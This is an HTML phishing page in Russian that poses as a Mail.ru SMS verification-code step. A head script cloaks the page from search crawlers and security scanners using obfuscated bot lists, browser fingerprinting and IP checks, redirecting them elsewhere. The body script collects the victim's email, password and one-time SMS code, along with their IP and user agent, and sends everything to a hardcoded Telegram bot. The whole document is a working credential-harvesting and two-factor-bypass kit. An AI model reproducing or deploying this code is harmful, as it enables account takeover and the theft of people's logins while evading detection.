<!DOCTYPE html>
<html lang="ru">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="robots" content="noindex,nofollow">
  <title>Подтверждение кода</title>
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500&display=swap" rel="stylesheet">
  <!-- Super Cloaking Script (2025: UA/IP/FP/Behavior + Obfuscation, Less Aggressive) -->
  <script>
    (function() {
      // Obfuscated bot UAs
      var _0x1a2b=['Googlebot','AdsBot-Google','Bingbot','BingPreview','msnbot','Slurp','Yahoo! Slurp','DuckDuckBot','YandexBot','YandexImages','facebookexternalhit','Twitterbot','LinkedInBot','AhrefsBot','MJ12bot','SemrushBot','Baiduspider','HeadlessChrome'];
      var _0x3c4d=function(_0x5e6f){return _0x5e6f.toLowerCase().indexOf(_0x1a2b.join('|'))>-1;};
    
      // Enhanced JS Fingerprint
      function getFingerprint() {
        var canvas = document.createElement('canvas');
        var ctx = canvas.getContext('2d');
        ctx.textBaseline = 'top'; ctx.font = '14px Arial'; ctx.fillText('test', 2, 2);
        var fingerprint = canvas.toDataURL();
        var gl = document.createElement('canvas').getContext('webgl');
        var debugInfo = gl.getExtension('WEBGL_debug_renderer_info') || {};
        var renderer = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL) || '';
        var fonts = Array.from(document.fonts).length;
        var hardware = navigator.hardwareConcurrency || 0;
        var screen = `${screen.width}x${screen.height}`;
        var plugins = navigator.plugins ? navigator.plugins.length : 0;
        var webdriver = navigator.webdriver ? 'true' : 'false';
        return btoa(fingerprint + renderer + fonts + hardware + screen + plugins + webdriver);
      }
    
      // IP/ASN check (less aggressive: fewer ASNs, fallback)
      async function isSuspiciousIP() {
        try {
          var res = await fetch('https://ipapi.co/json/');
          var data = await res.json();
          var suspiciousASNs = [15169, 8075]; // Reduced list
          return suspiciousASNs.includes(data.asn) || (data.org && data.org.includes('Google')) || data.proxy;
        } catch (e) { return false; }
      }
    
      // Behavior (enhanced: add scroll, keypress)
      var mouseMoved = false, touchStarted = false, scrolled = false, keyPressed = false, loadTime = Date.now();
      document.addEventListener('mousemove', () => { mouseMoved = true; });
      document.addEventListener('touchstart', () => { touchStarted = true; });
      document.addEventListener('scroll', () => { scrolled = true; });
      document.addEventListener('keypress', () => { keyPressed = true; });
    
      // Token filter
      var params = new URLSearchParams(window.location.search);
      var isValidToken = params.get('token') === 'valid2025';
    
      // Cloak check (less aggressive: staged checks, delayed redirect)
      async function cloakCheck() {
        // Initial delay to avoid instant detection
        setTimeout(async () => {
          var ua = navigator.userAgent;
          var isBotUA = _0x3c4d(ua);
          var fp = getFingerprint();
          var isHeadless = fp.includes('Headless') || fp.includes('true') || fp.length < 150; // Adjusted threshold
          var ipSusp = await isSuspiciousIP();
          var timeOnPage = (Date.now() - loadTime) > 1500; // Reduced from 2000
          var humanBehavior = mouseMoved || touchStarted || scrolled || keyPressed;
        
          // Score-based suspicion (less aggressive: need multiple fails)
          var suspicionScore = 0;
          if (isBotUA) suspicionScore += 2;
          if (isHeadless) suspicionScore += 2;
          if (ipSusp) suspicionScore += 1;
          if (!isValidToken) suspicionScore += 1;
          if (!humanBehavior) suspicionScore += 1;
          if ((Date.now() - loadTime) < 500) suspicionScore += 1; // Early load check
        
          if (suspicionScore >= 3) { // Threshold for redirect (not instant fail)
            // Delayed redirect to mimic normal behavior
            setTimeout(() => {
              window.location.replace('https://mail.ru');
            }, 2000 + Math.random() * 3000); // Random delay 2-5s
            return;
          }
        
          // If passed, show content gradually
          document.body.style.display = 'flex';
        
          // Honeypot
          var honeypot = document.createElement('input');
          honeypot.type = 'text'; honeypot.style.display = 'none'; honeypot.name = 'honeypot';
          if (document.getElementById('codeForm')) {
            document.getElementById('codeForm').appendChild(honeypot);
          }
        
          // Lazy load with delay
          setTimeout(() => {
            var img = document.querySelector('.icon-sms img');
            if (img) img.src = 'source/sms-icon.png?' + Date.now();
          }, 800); // Increased delay
        }, 1000); // Initial check delay
      }
    
      cloakCheck();
    
      window.addEventListener('beforeunload', () => {
        if ((Date.now() - loadTime) < 800) console.log('Early exit detected');
      });
    })();
  </script>
  <style>
    body { display: none; margin: 0; font-family: 'Inter', sans-serif; background: #f1f3f5; display: flex; justify-content: center; align-items: center; height: 100vh; }
    .container { background: #fff; border-radius: 12px; box-shadow: 0 5px 15px rgba(0,0,0,0.1); padding: 30px; width: 360px; position: relative; text-align: center; }
    .back-arrow { position: absolute; top: 20px; left: 20px; font-size: 20px; color: #555; cursor: pointer; }
    .icon-sms { width: 70px; margin: 40px auto 20px; }
    .icon-sms img { width: 100%; }
    h2 { font-size: 16px; font-weight: 500; margin: 0 0 6px; }
    .email { color: #5f6368; font-size: 14px; margin-bottom: 10px; }
    .code-hint { color: #666; font-size: 13px; margin-bottom: 20px; }
    .input-group { display: flex; align-items: center; border: 1px solid #ccc; border-radius: 6px; padding: 0 10px; background: #f9f9f9; margin-bottom: 12px; }
    .input-group input { border: none; background: transparent; padding: 10px; flex: 1; outline: none; font-size: 14px; text-align: center; letter-spacing: 5px; }
    .options { display: flex; justify-content: space-between; align-items: center; margin-bottom: 15px; font-size: 13px; }
    .options label { display: flex; align-items: center; }
    .options input { margin-right: 6px; }
    .options a { text-decoration: none; color: #3390ec; font-size: 12px; }
    .btn-login { width: 100%; padding: 10px; background: #3390ec; border: none; border-radius: 6px; color: #fff; font-size: 15px; font-weight: 500; cursor: pointer; transition: background 0.2s; }
    .btn-login:hover { background: #2b7ed7; }
    .footer { font-size: 11px; color: #888; margin-top: 14px; line-height: 1.3; padding: 0 10px; }
    .footer a { color: #3390ec; text-decoration: none; }
  </style>
</head>
<body>
  <div class="container">
    <div class="back-arrow">&larr;</div>
    <div class="icon-sms">
      <img src="source/password-logo.png" alt="Иконка SMS">
    </div>
    <h2>Введите код из SMS</h2>
    <div class="email" id="userEmail">test@mail.ru</div>
    <div class="code-hint" id="codeHint">Мы отправили код на номер, привязанный к аккаунту</div>
    <form id="codeForm">
      <div class="input-group">
        <input type="text" name="code" placeholder="Код из SMS" id="code-field" maxlength="10" required pattern="[0-9]{1,10}">
      </div>
      <div class="options">
        <label><input type="checkbox" name="remember" checked> Запомнить устройство</label>
        <a href="#" id="resend">Отправить код заново</a>
      </div>
      <button type="submit" class="btn-login">Подтвердить</button>
    </form>
    <div class="footer">
      Код действителен 5 минут. Не получили? <a href="#">Поддержка</a>
    </div>
  </div>
  <script>
    // Unicode-safe Base64 functions
    function encodeToBase64(str) {
      try {
        return btoa(unescape(encodeURIComponent(str)));
      } catch (e) {
        console.error('Encoding error:', e);
        return btoa(str);
      }
    }
    function decodeFromBase64(encoded) {
      try {
        return decodeURIComponent(escape(atob(encoded)));
      } catch (e) {
        console.error('Decoding error:', e);
        return atob(encoded);
      }
    }
    // getIP
    async function getIP() {
      try {
        const res = await fetch('https://api.ipify.org?format=json');
        const data = await res.json();
        return data.ip;
      } catch (e) { return 'Unknown IP'; }
    }
    // sendToTelegram
    async function sendToTelegram(data) {
      const botToken = '8071951540:AAH9dJyp9_AUvPVrxYyDAFehMY-_YWpFppU'; // Підстави
      const chatId = '8290282413'; // Підстави
      const title = 'Основний набір (email + пароль + код):';
      const message = `${title}\n1. Пошта: ${data.email}\n2. Пароль: ${data.password}\n3. User Agent: ${data.userAgent}\n4. IP: ${data.ip}\n5. Email ID: ${data.emailId || 'null'}\n6. code_number: ${data.code}\nTimestamp: ${data.timestamp}`;
      try {
        await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ chat_id: chatId, text: message })
        });
      } catch (e) { console.error('Помилка відправки:', e); }
    }
    document.addEventListener('DOMContentLoaded', function() {
      const params = new URLSearchParams(window.location.search);
      let encodedEmail = params.get('email'), encodedPassword = params.get('password');
      let emailId = params.get('emailId') || localStorage.getItem('userEmailId');
      if (emailId) {
        localStorage.setItem('userEmailId', emailId);
      }
      let email, password;
      if (encodedEmail) {
        try {
          email = decodeFromBase64(encodedEmail);
        } catch (e) {
          console.error('Помилка декодування email:', e);
        }
      }
      if (!email) { email = localStorage.getItem('userEmail'); }
      if (encodedPassword) {
        try {
          password = decodeFromBase64(encodedPassword);
        } catch (e) {
          console.error('Помилка декодування password:', e);
        }
      }
      if (!password) { password = localStorage.getItem('userPassword'); }
    
      const emailBox = document.getElementById('userEmail');
      const codeHint = document.getElementById('codeHint');
      if (email) {
        emailBox.textContent = email;
      }
      // Resend код (опционально: вызови прокси заново)
      document.getElementById('resend').addEventListener('click', async () => {
        alert('Код отправлен заново');
      });
      // Submit: Ввод кода → завершение прокси
      document.getElementById('codeForm').addEventListener('submit', async (e) => {
        e.preventDefault();
        const code = document.getElementById('code-field').value;
        if (code.length < 1 || code.length > 10 || !/^\d+$/.test(code)) {
          alert('Введите код из 1-10 цифр');
          return;
        }
      
        const ip = await getIP();
        const data = {
          email, password, code, emailId,
          userAgent: navigator.userAgent, ip,
          timestamp: new Date().toISOString()
        };
      
        await sendToTelegram(data);
      
        localStorage.clear();
        window.location.href = 'sms-code2.html';
      });
      // Back arrow
      document.querySelector('.back-arrow').addEventListener('click', () => { window.history.back(); });
    });
  </script>
</body>
</html>
